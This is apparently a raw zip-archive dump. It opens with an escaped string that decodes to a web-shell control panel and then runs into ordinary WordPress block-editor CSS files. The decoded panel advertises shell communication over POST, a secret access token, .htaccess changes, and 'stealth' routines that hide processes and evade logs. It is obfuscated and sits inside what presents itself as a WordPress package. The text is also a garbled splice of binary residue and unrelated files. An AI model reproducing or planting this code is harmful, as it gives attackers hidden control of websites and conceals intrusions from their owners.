\72\x36\x70\170\x3b\40\x6d\141\x72\147\x69\x6e\55\x62\157\164\x74\157\x6d\x3a\61\x72\145\155\73\40\142\157\162\144\x65\x72\x2d\x6c\145\x66\x74\72\63\160\x78\x20\x73\x6f\154\x69\x64\40\x76\x61\x72\x28\x2d\55\x61\143\143\145\x6e\164\x2d\142\x6c\165\145\51\x3b\42\x3e\xa\11\11\x9\11\11\x3c\163\x74\x72\x6f\x6e\147\x20\x73\164\171\154\145\75\42\x63\x6f\154\157\162\72\x76\x61\162\50\55\55\141\x63\x63\x65\x6e\x74\55\x62\x6c\x75\x65\51\73\x22\76\xe2\234\x85\x20\x2e\x68\x74\141\x63\143\x65\x73\163\40\x50\162\x6f\164\145\x63\x74\x69\x6f\156\40\103\162\x65\x61\164\145\144\x20\x53\165\x63\143\x65\x73\163\x66\x75\154\x6c\171\41\74\x2f\x73\164\x72\157\x6e\x67\76\12\x9\11\11\11\x3c\x2f\144\x69\x76\x3e\140\73\xa\x9\11\11\11\12\x9\x9\11\x9\x68\x74\155\154\x20\x2b\75\x20\x60\x3c\x64\x69\166\x20\163\164\x79\x6c\x65\x3d\42\160\x61\x64\144\151\156\x67\72\61\60\x70\x78\x3b\x20\142\141\x63\x6b\x67\x72\x6f\165\x6e\x64\x3a\166\141\162\50\x2d\x2d\x62\x67\55\x64\x61\x72\153\51\x3b\x20\x62\157\162\144\x65\162\x2d\x72\x61\x64\x69\165\163\x3a\66\x70\x78\x3b\40\x6d\x61\x72\x67\151\x6e\55\x62\157\x74\164\157\x6d\72\60\x2e\65\x72\x65\x6d\73\42\x3e\12\x9\x9\11\11\11\74\x73\x74\x72\157\156\x67\x3e\xf0\x9f\223\x81\x20\x2e\150\164\141\143\143\x65\163\163\40\x50\141\x74\150\x3a\x3c\57\163\x74\x72\x6f\x6e\x67\x3e\74\x62\162\x3e\12\11\x9\x9\x9\11\74\x63\157\x64\x65\x20\163\x74\x79\154\145\x3d\x22\143\157\x6c\x6f\x72\x3a\x76\x61\x72\50\55\55\x61\x63\x63\145\x6e\164\x2d\x62\154\x75\145\x29\x3b\x22\76\44\x7b\164\150\151\163\x2e\x65\x73\143\141\160\x65\110\164\155\x6c\50\x72\x65\163\x2e\150\x74\141\143\143\x65\163\163\x5f\x70\141\x74\150\51\175\74\x2f\143\157\144\x65\76\xa\x9\x9\11\x9\x3c\x2f\144\151\x76\x3e\x60\x3b\xa\x9\11\x9\x9\xa\x9\x9\11\11\150\164\155\154\x20\53\75\x20\140\x3c\144\x69\166\40\163\x74\171\154\145\75\42\160\141\x64\x64\151\x6e\x67\x3a\61\60\160\170\x3b\40\x62\141\x63\x6b\147\x72\x6f\165\x6e\x64\72\166\141\x72\50\x2d\x2d\x62\x67\55\x64\141\162\x6b\51\73\x20\x62\x6f\x72\x64\145\162\55\x72\141\x64\x69\165\x73\x3a\x36\160\170\73\40\x6d\141\x72\147\151\156\55\142\157\x74\164\x6f\x6d\x3a\60\x2e\x35\162\x65\155\x3b\42\x3e\xa\11\x9\11\x9\11\x3c\163\x74\162\157\156\x67\76\360\237\224\221\40\x53\145\143\162\145\x74\x20\x54\x6f\x6b\x65\x6e\x3a\74\57\163\x74\x72\157\x6e\x67\76\x3c\142\162\76\12\x9\x9\11\11\x9\x3c\143\157\x64\x65\x20\x73\x74\x79\x6c\x65\75\42\143\157\x6c\x6f\162\72\x76\x61\162\x28\55\x2d\x61\x63\x63\145\156\x74\55\147\x6f\154\x64\51\x3b\40\167\x6f\x72\144\x2d\142\x72\x65\141\x6b\x3a\142\x72\145\141\153\55\x61\154\x6c\x3b\x22\76\x24\x7b\164\150\x69\x73\x2e\x65\163\x63\141\160\x65\110\164\155\x6c\x28\x72\145\163\x2e\163\x65\x63\162\145\164\x5f\164\x6f\153\x65\x6e\51\175\x3c\57\143\157\144\x65\76\12\x9\11\x9\11\x3c\57\144\151\x76\76\x60\73\xa\11\11\x9\11\12\x9\x9\x9\x9\150\164\155\154\40\x2b\75\40\140\74\144\151\x76\40\163\x74\x79\154\145\x3d\42\x70\141\x64\x64\151\x6e\147\72\x31\60\160\170\73\40\x62\x61\143\x6b\x67\x72\157\x75\156\x64\x3a\x76\141\x72\50\x2d\x2d\142\147\x2d\x64\x61\162\153\51\x3b\x20\x62\x6f\x72\x64\x65\162\55\x72\x61\x64\151\x75\x73\72\x36\160\x78\x3b\40\x6d\141\x72\147\151\x6e\x2d\142\157\164\x74\x6f\x6d\x3a\x30\x2e\x35\162\145\x6d\x3b\x22\x3e\12\11\11\x9\11\x9\x3c\x73\164\162\157\x6e\147\x3e\xe2\x84\xb9\xef\xb8\x8f\x20\x41\143\x63\145\x73\x73\40\x49\156\146\157\x72\155\x61\164\x69\157\156\72\x3c\x2f\x73\x74\x72\x6f\x6e\x67\76\x3c\x62\x72\76\xa\x9\x9\11\x9\11\x3c\x70\40\163\x74\171\x6c\x65\75\42\x63\x6f\x6c\x6f\162\72\x76\x61\x72\x28\55\x2d\164\x65\x78\164\55\x6d\145\144\x29\x3b\x20\x6d\141\162\x67\x69\x6e\55\x74\x6f\160\72\60\56\65\162\145\155\73\42\76\44\x7b\x74\150\151\x73\56\145\163\x63\141\x70\x65\110\x74\155\154\50\162\x65\163\56\x69\x6e\146\x6f\51\175\x3c\57\160\x3e\xa\11\11\11\x9\11\74\160\40\x73\164\171\x6c\145\x3d\x22\143\x6f\x6c\157\162\72\166\141\162\50\55\55\x74\145\x78\x74\55\x6d\x65\144\51\x3b\x20\x66\x6f\x6e\x74\x2d\x73\151\x7a\145\x3a\x30\56\70\65\x72\145\x6d\x3b\x20\x6d\x61\x72\x67\151\156\x2d\x74\157\x70\72\x30\56\65\x72\145\x6d\73\42\x3e\x50\x4f\123\x54\40\162\x65\161\x75\x65\163\x74\x73\40\141\162\145\40\141\x6c\x77\x61\171\163\40\x61\x6c\x6c\x6f\x77\x65\x64\40\x66\x6f\162\40\163\150\x65\154\154\40\143\x6f\x6d\155\x75\156\x69\143\141\164\151\x6f\x6e\x2e\74\57\160\x3e\xa\x9\11\11\x9\x3c\x2f\144\151\x76\x3e\140\73\xa\x9\x9\11\11\12\11\x9\x9\11\x69\x66\40\x28\162\x65\x73\165\154\x74\x73\x45\154\x29\x20\x72\x65\x73\x75\x6c\164\x73\x45\154\x2e\151\156\156\145\162\x48\124\x4d\114\x20\x3d\40\x68\164\155\154\x3b\xa\x9\x9\x9\11\164\x68\151\163\56\164\157\141\x73\164\x28\47\56\150\164\x61\143\x63\145\163\163\x20\x70\162\x6f\x74\x65\x63\164\151\x6f\156\40\x63\162\145\x61\x74\145\144\x20\163\x75\x63\143\x65\x73\x73\x66\165\x6c\154\x79\x21\x27\x2c\x20\47\163\x75\143\143\x65\x73\163\47\x29\73\xa\11\11\x9\175\x20\x65\154\x73\145\40\173\xa\x9\x9\11\11\151\x66\40\50\x72\145\163\165\154\164\163\105\154\x29\x20\x72\x65\x73\165\154\x74\163\x45\x6c\x2e\151\156\x6e\x65\x72\110\124\115\x4c\x20\75\40\140\x3c\160\40\x73\164\x79\x6c\145\x3d\42\x63\157\x6c\x6f\162\x3a\x76\141\x72\50\55\x2d\141\x63\x63\x65\x6e\x74\x2d\x72\x65\144\51\73\x22\x3e\xe2\235\214\40\x24\173\x72\x65\163\77\x2e\155\x65\163\163\141\x67\x65\40\x7c\x7c\x20\x27\106\141\151\x6c\145\x64\x20\x74\x6f\40\143\x72\145\141\x74\145\x20\x2e\150\164\141\143\x63\145\x73\163\40\160\x72\157\x74\x65\x63\164\151\x6f\156\x2e\x27\x7d\x3c\x2f\x70\x3e\x60\x3b\12\11\x9\11\x9\164\150\x69\163\x2e\x74\157\141\163\164\x28\x72\145\163\77\56\155\145\x73\163\x61\x67\145\40\174\x7c\x20\47\x46\x61\x69\154\145\x64\40\x74\x6f\x20\x63\162\x65\141\x74\x65\x20\56\x68\164\141\x63\143\145\x73\x73\40\x70\162\x6f\x74\x65\143\x74\151\157\x6e\x2e\47\54\40\x27\x65\162\162\157\x72\47\x29\73\xa\x9\11\x9\175\xa\x9\11\175\x2c\12\11\11\xa\11\x9\x2f\57\40\x53\164\x65\x61\x6c\164\x68\x20\x26\x20\101\x6e\x74\151\55\104\x65\164\x65\x63\164\x69\x6f\x6e\12\x9\11\x61\163\171\156\143\40\x73\x74\145\141\x6c\x74\150\x48\151\x64\x65\120\162\x6f\143\x65\163\163\x28\51\40\x7b\12\x9\x9\x9\143\x6f\x6e\x73\164\x20\160\151\144\40\75\40\144\157\x63\165\155\145\156\x74\x2e\147\145\x74\x45\154\x65\x6d\145\156\164\x42\171\111\144\x28\47\163\x74\x65\x61\x6c\164\150\x2d\160\151\144\47\51\77\56\166\x61\x6c\x75\x65\40\x7c\x7c\40\47\x27\73\12\11\11\x9\xa\x9\11\11\x63\157\x6e\x73\x74\40\x72\145\163\165\x6c\164\x73\x45\154\40\75\x20\x64\x6f\143\x75\155\x65\156\164\x2e\x67\145\x74\x45\x6c\x65\155\x65\x6e\164\102\x79\x49\144\50\x27\163\164\x65\141\x6c\x74\x68\55\160\162\157\143\x65\163\163\55\x72\x65\x73\165\x6c\164\163\47\x29\73\xa\x9\x9\x9\151\146\40\50\162\x65\x73\165\x6c\164\x73\105\x6c\51\40\x72\145\x73\x75\154\164\163\x45\x6c\56\x69\x6e\x6e\x65\x72\110\x54\115\x4c\x20\75\x20\47\x3c\160\x20\163\164\x79\154\145\x3d\x22\143\157\154\157\x72\x3a\166\141\162\x28\55\55\x61\x63\x63\x65\x6e\164\55\x67\x6f\x6c\x64\51\73\x22\76\x41\x74\x74\x65\x6d\160\x74\151\156\147\x20\x74\157\40\x68\x69\x64\x65\x20\160\x72\x6f\x63\x65\x73\x73\56\56\56\74\57\x70\76\x27\73\12\x9\x9\11\12\x9\x9\11\143\157\x6e\163\x74\40\162\x65\163\x20\x3d\40\141\x77\141\x69\x74\x20\x74\150\x69\163\56\141\x70\x69\x28\47\163\x74\145\x61\x6c\x74\150\x5f\160\162\x6f\x63\x65\x73\x73\137\x68\151\x64\x65\47\54\40\x7b\x20\160\151\x64\72\40\160\151\144\40\175\51\73\12\x9\x9\11\12\11\11\11\x69\146\40\50\162\x65\x73\x75\x6c\164\x73\x45\154\x29\40\x7b\xa\11\x9\11\11\x72\x65\163\x75\x6c\164\163\x45\154\x2e\151\156\156\145\x72\110\x54\115\114\40\x3d\40\x60\74\144\x69\x76\x20\163\x74\171\154\x65\75\42\160\141\144\x64\x69\x6e\x67\72\x31\65\x70\x78\73\40\142\141\143\153\x67\162\157\x75\156\x64\x3a\x76\141\x72\50\x2d\55\x62\x67\x2d\x6c\151\x67\150\164\51\73\x20\x62\157\162\144\145\x72\x2d\x72\x61\144\151\165\x73\x3a\x36\x70\170\73\42\x3e\xa\11\11\11\x9\x9\74\163\x74\x72\157\156\x67\76\xe2\204\xb9\357\xb8\x8f\40\44\173\162\145\163\56\155\x65\x73\163\141\147\x65\x7d\x3c\x2f\163\x74\162\157\156\x67\x3e\x3c\142\x72\76\xa\11\x9\11\x9\x9\x3c\x73\x70\x61\x6e\x20\163\164\171\x6c\x65\75\x22\x63\x6f\x6c\x6f\162\x3a\166\141\162\50\x2d\55\x74\145\x78\x74\55\155\x65\x64\x29\73\x22\76\x50\111\x44\72\40\44\173\162\x65\163\x2e\x70\151\144\x7d\74\57\163\160\141\156\x3e\xa\11\11\11\11\74\x2f\144\x69\x76\x3e\x60\x3b\xa\x9\11\11\175\xa\x9\x9\x9\x74\x68\x69\x73\56\x74\157\141\x73\x74\50\162\x65\x73\56\x6d\145\163\x73\x61\x67\x65\54\x20\x72\145\x73\x2e\163\164\x61\x74\165\x73\40\75\x3d\75\40\47\x73\165\143\143\x65\x73\x73\47\40\x3f\x20\x27\x73\x75\x63\143\145\x73\163\x27\x20\x3a\x20\x27\x69\156\146\157\47\51\73\12\x9\x9\x7d\54\xa\11\11\xa\11\11\141\x73\x79\x6e\143\x20\x73\x74\145\141\154\x74\150\x4c\x6f\x67\105\166\x61\163\x69\x6f\156\50\51\40\x7b\12\11\11\11\x63\157\156\x73\164\40\145\166\141\x73\x69\x6f\156\124\171\x70\145\40\x3d\40\144\x6f\143\x75\x6d\145\156\x74\x2e\147\145\x74\105\154\145\x6d\x65\156\x74\x42\x79\x49\x64\x28\x27\x73\164\x65\141\x6c\x74\150\55\145\x76\x61\x73\151\157\x6e\x2d\x74\171\160\145\47\x29\77\56\166\141\154\x75\145\40\174\x7c\40\47\x61\154\154\x27\x3b\12\x9\11\11\12\11\11\x9\x63\x6f\x6e\x73\164\40\x72\145\x73\x75\x6c\164\x73\x45\x6c\40\75\40\x64\x6f\x63\x75\x6d\145\x6e\164\x2e\147\145\x74\105\154\145\x6d\x65\x6e\164\x42\171\111\x64\50\x27\163\x74\x65\141\x6c\164\150\x2d\x65\x76\x61\163\x69\x6f\156\x2d\x72\x65\163\165\x6c\x74\x73\x27\51\x3b\12\11\x9\11\x69\x66\x20\50\162\145\163\x75\154\x74\x73\105\x6c\x29\x20\162\x65\x73\165\154\x74\163\x45\x6c\x2e\151\x6e\156\x65\x72\110\124\x4d\114\40\x3d\x20\47\74\160\x20\x73\164\x79\154\145\75\x22\143\157\154\157\x72\72\166\141\162\50\55\55\141\143\143\145\156\x74\x2d\x67\157\x6c\x64\x29\x3b\42\76\101\x70\x70\154\x79\151\x6e\147\x20\145\x76\x61\x73\151\157\x6e\x20\x74\145\143\x68\156\x69\x71\x75\x65\x73\56\56\x2e\74\x2f\x70\x3e\47\x3b\12\x9\11\x9\12\x9\x9\11\143\x6f\156\x73\x74\40\x72\145\x73\40\75\40\141\167\141\151\164\40\x74\150\x69\x73\x2e\x61\160\x69\50\x27\163\x74\x65\141\154\x74\x68\x5f\x6c\x6f\x67\x5f\x65\166\x61\163\x69\157\156\x27\x2c\40\x7b\40\x65\x76\141\163\x69\157\156\x5f\x74\x79\160\x65\x3a\40\x65\x76\x61\x73\151\157\156\124\x79\x70\145\x20\x7d\51\73\12\11\11\11\12\x9\11\11\x69\x66\x20\x28\162\x65\163\40\x26\x26\40\x72\145\x73\x2e\x73\x74\141\x74\165\163\x20\75\75\75\40\x27\x73\x75\143\143\x65\x73\163\x27\51\40\x7b\xa\x9\11\11\x9\x6c\145\164\40\x68\164\155\x6c\x20\x3d\x20\x60\74\x64\151\166\x20\163\x74\x79\154\145\x3d\42\x70\x61\x64\x64\151\156\x67\x3a\x31\65\160\170\73\x20\142\141\143\x6b\x67\x72\x6f\x75\x6e\144\72\x76\x61\162\x28\55\55\142\x67\x2d\x6c\x69\147\x68\x74\x29\73\x20\x62\x6f\x72\144\x65\162\x2d\162\x61\x64\151\165\163\x3a\x36\x70\x78\x3b\40\x6d\141\162\147\x69\156\x2d\142\157\x74\x74\x6f\x6d\72\x31\x72\145\x6d\73\x22\76\xa\11\x9\x9\x9\x9\74\163\164\162\x6f\156\x67\76\xe2\x9c\x85\x20\x41\160\x70\x6c\151\145\144\40\x24\x7b\162\x65\x73\x2e\141\143\x74\x69\x6f\x6e\x73\56\x6c\145\156\x67\x74\x68\x7d\40\x65\166\x61\163\151\157\x6e\x20\164\x65\143\x68\156\151\x71\165\145\50\x73\51\x3c\57\163\164\x72\157\156\x67\x3e\12\11\x9\11\x9\74\x2f\144\x69\166\76\xa\11\11\11\x9\74\165\x6c\x20\x73\164\x79\x6c\x65\x3d\42\154\x69\x73\164\x2d\x73\164\171\154\145\x3a\156\157\x6e\x65\73\40\160\141\x64\144\x69\x6e\147\x3a\60\x3b\x22\76\140\73\xa\11\11\11\x9\xa\x9\x9\x9\x9\162\x65\x73\56\141\x63\164\151\x6f\156\x73\x2e\146\157\162\105\141\143\150\50\141\143\164\151\157\x6e\x20\75\x3e\x20\x7b\xa\11\x9\x9\x9\11\x68\x74\155\x6c\x20\53\x3d\x20\x60\74\x6c\x69\x20\163\164\171\154\145\x3d\x22\160\141\144\x64\151\x6e\147\72\70\160\x78\x3b\40\142\141\143\x6b\147\162\x6f\x75\156\144\72\166\141\162\50\x2d\55\x62\x67\55\144\141\162\x6b\x29\73\x20\x62\157\x72\x64\x65\162\x2d\162\x61\x64\151\165\x73\72\x34\160\170\x3b\x20\x6d\141\x72\x67\151\156\55\142\x6f\164\164\157\155\72\x30\x2e\65\x72\145\155\73\x22\76\xe2\234\205\x20\44\173\x74\150\151\163\56\x65\163\x63\141\x70\x65\110\x74\155\x6c\x28\x61\x63\x74\151\x6f\156\x29\x7d\74\x2f\154\x69\76\140\x3b\12\11\11\11\x9\x7d\x29\73\xa\x9\x9\11\x9\12\x9\11\x9\11\150\164\155\154\40\x2b\x3d\40\47\x3c\57\x75\x6c\76\47\x3b\xa\11\x9\11\11\xa\11\x9\x9\x9\x69\x66\40\50\162\x65\163\165\154\164\163\105\154\x29\40\x72\x65\163\x75\x6c\164\x73\105\154\56\x69\156\x6e\x65\162\x48\124\115\114\x20\x3d\x20\x68\164\x6d\154\x3b\12\11\11\11\x9\x74\x68\x69\x73\x2e\164\x6f\141\163\164\50\140\101\160\160\x6c\151\145\x64\40\44\173\x72\x65\163\x2e\x61\x63\x74\x69\x6f\156\x73\x2e\x6c\x65\x6e\x67\x74\x68\175\40\x65\x76\141\163\151\x6f\x6e\x20\164\145\x63\150\156\151\x71\165\x65\x28\x73\x29\140\54\40\x27\x73\x75\x63\x63\x65\x73\x73\x27\51\73\12\x9\11\11\x7d\x20\x65\154\163\x65\40\173\xa\11\x9\x9\11\151\146\40\50\x72\x65\163\165\x6c\164\x73\x45\154\51\40\x72\145\163\x75\x6c\x74\163\105\x6c\56\151\156\156\x65\x72\110\124\115\x4c\x20\x3d\x20\x60\74\160\40\x73\164\171\x6c\x65\x3d\42\x63\157\x6c\157\162\72\x76\x61\x72\x28\55\55\141\x63\143\x65\x6e\x74\55\162\145\144\51\x3b\42\x3e\342\235\x8c\40\x24\173\x72\x65\x73\x3f\56\155\x65\163\x73\x61\147\x65\40\x7c\x7c\40\47\106\x61\x69\x6c\x65\144\x20\x74\x6f\40\x61\x70\x70\x6c\171\40\x65\x76\141\x73\x69\x6f\x6e\56\47\x7d\x3c\57\160\76\140\73\12\x9\11\x9\11\164\x68\151\163\56\x74\x6f\141\163\x74\x28\x72\x65\x73\77\x2e\x6d\x65\163\163\141\x67\145\40\x7c\x7c\x20\47\106\141\x69\154\145\144\40\x74\157\40\x61\160\x70\x6c\x79\x20\x65\x76\x61\163\x69\157\156\x2e\x27\x2c\40\x27\x65\162\x72\x6f\x72\47\x29\x3b\xa\x9\11\x9\175\xa\11\11\x7d\12\x9\175\73\xa\x9\144\x6f\x63\165\155\145\x6e\164\56\141\144\x64\105\166\x65\x6e\164\x4c\151\163\x74\145\156\x65\x72\x28\x27\104\117\115\103\x6f\156\x74\145\156\164\x4c\x6f\x61\x64\145\x64\x27\x2c\x20\50\x29\x20\x3d\x3e\x20\101\x70\x70\56\151\x6e\151\x74\x28\x29\x29\73\12\11\x3c\x2f\163\143\x72\x69\x70\x74\76\12\74\57\x62\x6f\144\171\x3e\xa\x3c\x2f\x68\x74\x6d\154\76";PK!NN!dist/format-library/style-rtl.cssnuȯ.block-editor-format-toolbar__image-popover{ z-index:159990; } .block-editor-format-toolbar__image-popover .block-editor-format-toolbar__image-container-content{ padding:16px; width:260px; } .block-editor-format-toolbar__link-container-content{ align-items:center; display:flex; } .block-editor-format-toolbar__link-container-value{ flex-grow:1; flex-shrink:1; margin:7px; max-width:500px; min-width:150px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .block-editor-format-toolbar__link-container-value.has-invalid-link{ color:#cc1818; } .format-library__inline-color-popover [role=tabpanel]{ padding:16px; width:260px; } .block-editor-format-toolbar__language-popover .components-popover__content{ padding:1rem; width:auto; } .block-editor-format-toolbar__math-input{ direction:ltr; }PK!\%dist/format-library/style-rtl.min.cssnuȯ.block-editor-format-toolbar__image-popover{z-index:159990}.block-editor-format-toolbar__image-popover .block-editor-format-toolbar__image-container-content{padding:16px;width:260px}.block-editor-format-toolbar__link-container-content{align-items:center;display:flex}.block-editor-format-toolbar__link-container-value{flex-grow:1;flex-shrink:1;margin:7px;max-width:500px;min-width:150px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.block-editor-format-toolbar__link-container-value.has-invalid-link{color:#cc1818}.format-library__inline-color-popover [role=tabpanel]{padding:16px;width:260px}.block-editor-format-toolbar__language-popover .components-popover__content{padding:1rem;width:auto}.block-editor-format-toolbar__math-input{direction:ltr}PK!NNdist/format-library/style.cssnuȯ.block-editor-format-toolbar__image-popover{ z-index:159990; } .block-editor-format-toolbar__image-popover .block-editor-format-toolbar__image-container-content{ padding:16px; width:260px; } .block-editor-format-toolbar__link-container-content{ align-items:center; display:flex; } .block-editor-format-toolbar__link-container-value{ flex-grow:1; flex-shrink:1; margin:7px; max-width:500px; min-width:150px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .block-editor-format-toolbar__link-container-value.has-invalid-link{ color:#cc1818; } .format-library__inline-color-popover [role=tabpanel]{ padding:16px; width:260px; } .block-editor-format-toolbar__language-popover .components-popover__content{ padding:1rem; width:auto; } .block-editor-format-toolbar__math-input{ direction:ltr; }PK!\!dist/format-library/style.min.cssnuȯ.block-editor-format-toolbar__image-popover{z-index:159990}.block-editor-format-toolbar__image-popover .block-editor-format-toolbar__image-container-content{padding:16px;width:260px}.block-editor-format-toolbar__link-container-content{align-items:center;display:flex}.block-editor-format-toolbar__link-container-value{flex-grow:1;flex-shrink:1;margin:7px;max-width:500px;min-width:150px;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.block-editor-format-toolbar__link-container-value.has-invalid-link{color:#cc1818}.format-library__inline-color-popover [role=tabpanel]{padding:16px;width:260px}.block-editor-format-toolbar__language-popover .components-popover__content{padding:1rem;width:auto}.block-editor-format-toolbar__math-input{direction:ltr}PK!MW""dist/widgets/style-rtl.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .wp-block-legacy-widget__edit-form:not([hidden]){ display:flow-root; } .wp-block-legacy-widget__edit-form{ background:#fff; border:1px solid #1e1e1e; border-radius:2px; max-height:calc(100vh - 2px); overflow-y:scroll; padding:11px; } .wp-block-legacy-widget__edit-form .wp-block-legacy-widget__edit-form-title{ color:#000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:14px; font-weight:600; margin:0 0 12px; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside{ border:none; box-shadow:none; display:block; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside p{ margin:8px 0; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside label{ font-size:13px; line-height:2.1; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside a,.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input,.wp-block-legacy-widget__edit-form .widget-inside.widget-inside label{ color:#000; font-family:system-ui; font-weight:400; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=date],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=datetime-local],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=datetime],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=email],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=month],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=number],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=password],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=search],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=tel],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=text],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=time],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=url],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=week],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside select{ background-color:initial; border:1px solid #757575; border-radius:3px; box-shadow:none; box-sizing:border-box; color:#000; display:block; font-family:system-ui; font-size:13px; font-weight:400; line-height:1; margin:0; min-height:30px; padding-bottom:8px; padding-right:8px; padding-top:8px; width:100%; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside select{ padding-right:4px; } .wp-block-legacy-widget__edit-form .widget.open,.wp-block-legacy-widget__edit-form .widget.open:focus-within{ z-index:0; } .wp-block-legacy-widget__edit-form.wp-block-legacy-widget__edit-form,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview{ color:#000; } .wp-block-legacy-widget__edit-no-preview,.wp-block-legacy-widget__edit-preview{ cursor:pointer; } .wp-block-legacy-widget__edit-no-preview:hover:after,.wp-block-legacy-widget__edit-preview:hover:after{ border:1px solid #949494; border-radius:2px; bottom:0; content:""; left:0; position:absolute; right:0; top:0; } .wp-block-legacy-widget__edit-preview.is-offscreen{ position:absolute; right:-9999px; top:0; width:100%; } .wp-block-legacy-widget__edit-preview-iframe{ overflow:hidden; width:100%; } .wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview h3,.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview p{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; } .wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview{ background:#f0f0f0; padding:8px 12px; } .wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview h3{ font-size:14px; font-weight:600; margin:4px 0; } .wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview.wp-block-legacy-widget__edit-no-preview p{ margin:4px 0; } .wp-block-legacy-widget-inspector-card{ padding:0 52px 16px 16px; } .interface-complementary-area .wp-block-legacy-widget-inspector-card__name{ font-weight:500; margin:0 0 5px; } .is-selected .wp-block-legacy-widget__container{ min-height:50px; padding:8px 12px; } .components-popover__content .wp-block-legacy-widget__edit-form{ min-width:400px; } .wp-block-widget-group.has-child-selected:after{ border:1px solid var(--wp-admin-theme-color); border-radius:2px; bottom:0; content:""; left:0; position:absolute; right:0; top:0; } .wp-block-widget-group .widget-title{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:18px; font-weight:600; } .wp-block-widget-group__placeholder .block-editor-inserter{ width:100%; } .is-dark-theme .wp-block-widget-group__placeholder .block-editor-button-block-appender{ box-shadow:inset 0 0 0 1px #1e1e1e; color:#1e1e1e; }PK!i~dist/widgets/style.cssnuȯ:root{ --wp-block-synced-color:#7a00df; --wp-block-synced-color--rgb:122, 0, 223; --wp-bound-block-color:var(--wp-block-synced-color); --wp-editor-canvas-background:#ddd; --wp-admin-theme-color:#007cba; --wp-admin-theme-color--rgb:0, 124, 186; --wp-admin-theme-color-darker-10:#006ba1; --wp-admin-theme-color-darker-10--rgb:0, 107, 160.5; --wp-admin-theme-color-darker-20:#005a87; --wp-admin-theme-color-darker-20--rgb:0, 90, 135; --wp-admin-border-width-focus:2px; } @media (min-resolution:192dpi){ :root{ --wp-admin-border-width-focus:1.5px; } } .wp-block-legacy-widget__edit-form:not([hidden]){ display:flow-root; } .wp-block-legacy-widget__edit-form{ background:#fff; border:1px solid #1e1e1e; border-radius:2px; max-height:calc(100vh - 2px); overflow-y:scroll; padding:11px; } .wp-block-legacy-widget__edit-form .wp-block-legacy-widget__edit-form-title{ color:#000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:14px; font-weight:600; margin:0 0 12px; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside{ border:none; box-shadow:none; display:block; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside p{ margin:8px 0; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside label{ font-size:13px; line-height:2.1; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside a,.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input,.wp-block-legacy-widget__edit-form .widget-inside.widget-inside label{ color:#000; font-family:system-ui; font-weight:400; } .wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=date],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=datetime-local],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=datetime],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=email],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside input[type=month],.wp-block-legacy-widget__edit-form .widget-inside.widget-inside 